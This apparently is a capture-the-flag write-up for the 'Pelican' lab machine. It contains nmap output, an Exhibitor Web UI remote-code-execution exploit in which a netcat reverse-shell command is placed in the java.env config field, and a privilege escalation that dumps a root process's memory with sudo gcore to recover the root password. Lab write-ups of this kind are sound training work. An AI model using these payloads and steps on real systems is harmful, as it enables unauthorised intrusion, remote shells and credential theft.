Skip to main content

Pelican

Enumeration

  • Performed autorecon, below is nmap quick scan result
# Nmap 7.98 scan initiated Thu Mar 26 09:30:13 2026 as: /usr/lib/nmap/nmap --privileged -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/ctf/pvg/pelican/results/192.168.240.98/scans/_quick_tcp_nmap.txt -oX /home/kali/ctf/pvg/pelican/results/192.168.240.98/scans/xml/_quick_tcp_nmap.xml 192.168.240.98
Nmap scan report for 192.168.240.98
Host is up, received user-set (0.25s latency).
Scanned at 2026-03-26 09:30:13 UTC for 59s
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
| 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 61 CUPS 2.2
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-title: Forbidden - CUPS v2.2.10
2222/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
| 256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
| 256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp open http syn-ack ttl 61 Jetty 1.0
|_http-server-header: Jetty(1.0)
|_http-title: Error 404 Not Found
8081/tcp open http syn-ack ttl 61 nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://192.168.240.98:8080/exhibitor/v1/ui/index.html
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.98%E=4%D=3/26%OT=22%CT=1%CU=39811%PV=Y%DS=4%DC=T%G=Y%TM=69C4FCE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST11NW7%O5=M578ST1
OS:1NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 22.101 days (since Wed Mar 4 07:05:21 2026)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2026-03-26T09:30:36
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: pelican
| NetBIOS computer name: PELICAN\x00
| Domain name: \x00
| FQDN: pelican
|_ System time: 2026-03-26T05:30:35-04:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 61156/tcp): CLEAN (Couldn't connect)
| Check 2 (port 33005/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20986/udp): CLEAN (Failed to receive data)
| Check 4 (port 50998/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 238.99 ms 192.168.45.1
2 238.99 ms 192.168.45.254
3 239.07 ms 192.168.251.1
4 232.46 ms 192.168.240.98

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 09:31:12 2026 -- 1 IP address (1 host up) scanned in 58.93 seconds


  • Checking website on port 8081, got redirected to 8080 running exhibitor

  • Searched exploit for exhibitor
┌──(kali㉿hd)-[~/ctf/pvg/pelican]
└─$ searchsploit exhibitor
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Exhibitor Web UI 1.7.1 - Remote Code Execution | java/webapps/48654.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  • Exploit guide showed the java.env field is editable and we can insert reverse shell
Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON

In the “java.env script” field, enter any command surrounded by $() or ``, for example, for a simple reverse shell:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
Click Commit > All At Once > OK
The command may take up to a minute to execute.

Exploitation

  • Add rev shell payload and click commit

  • After commit, got rev shell as charles

Privilege Escalation

  • Ran sudo -l to check the permissions
charles@pelican:/opt/zookeeper$ sudo -l
Matching Defaults entries for charles on pelican:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
(ALL) NOPASSWD: /usr/bin/gcore
  • Charles can run gcore as sudo
  • Gcore is used to read the logs of currently running processes

  • Checking running processes of root user
charles@pelican:/opt/zookeeper$ ps -u root -f
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 01:04 ? 00:00:00 /sbin/init
root 2 0 0 01:04 ? 00:00:00 [kthreadd]
root 3 2 0 01:04 ? 00:00:00 [rcu_gp]

root 469 443 0 01:04 ? 00:00:00 /usr/sbin/CRON -f
root 487 469 0 01:04 ? 00:00:00 /bin/sh -c while true; do chown -R charles:charles /opt
root 512 1 0 01:04 ? 00:00:00 /usr/lib/policykit-1/polkitd --no-debug
root 513 1 0 01:04 ? 00:00:00 /usr/bin/password-store
root 514 1 0 01:04 ? 00:00:00 /usr/sbin/cups-browsed
root 554 1 0 01:04 ? 00:00:00 /usr/sbin/lightdm
root 557 1 0 01:04 ? 00:00:00 /usr/sbin/sshd -D
root 581 1 0 01:04 tty1 00:00:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 582 554 0 01:04 tty7 00:00:00 /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightd
root 6718 2 0 01:24 ? 00:00:00 [kworker/0:2-ata_sff]
root 8101 2 0 01:30 ? 00:00:00 [kworker/0:0-ata_sff]
root 9630 487 0 01:35 ? 00:00:00 sleep 1

  • Checking core dump of password
charles@pelican:/opt/zookeeper$ sudo gcore 513
0x00007f971bd1c6f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffc3d7a2c80, remaining=remaining@entry=0x7ffc3d7a2c80) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28 ../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.513
[Inferior 1 (process 513) detached]
charles@pelican:/opt/zookeeper$ strings core.513
CORE
password-store
/usr/bin/password-store
CORE
x,z=
CORE
/usr/bin/passwor
////////////////
LINUX
/usr/bin/passwor
////////////////
IGISCORE
CORE
ELIFCORE
/usr/bin/password-store
/usr/bin/password-store
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
fork failed!
/tmp
;*3$"
aliases
ethers
group
gshadow
hosts
initgroups
netgroup
networks
passwd
protocols
publickey
services
shadow
CAk[S
N?z=
E?z=
libc.so.6
/lib/x86_64-linux-gnu
libc.so.6
P-z=
;*3$"
P.z=
sse2
x86_64
avx512_1
i586
i686
haswell
xeon_phi
linux-vdso.so.1
tls/x86_64/x86_64/tls/x86_64/
/lib/x86_64-linux-gnu/libc.so.6
P z=
8!z=
P z=
P z=
p&z=
p&z=
p&z=
@&z=
h'z=
0+z=
+z=
+z=
@(z=
(+z=
/usr/bin/passwor
////////////////
/usr/bin/passwor
////////////////
////////////////
`,z=
@-z=
@-z=
uQx-
-z=
001 Password: root:
ClogKingpinInning731
E?z=
]?z=
h?z=
u?z=
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/root
/usr/bin/password-store
bemX

  • Found root password - ClogKingpinInning731
  • Logging in as root
charles@pelican:/opt/zookeeper$ su -
Password:
root@pelican:~# id; whoami
uid=0(root) gid=0(root) groups=0(root)
root
root@pelican:~#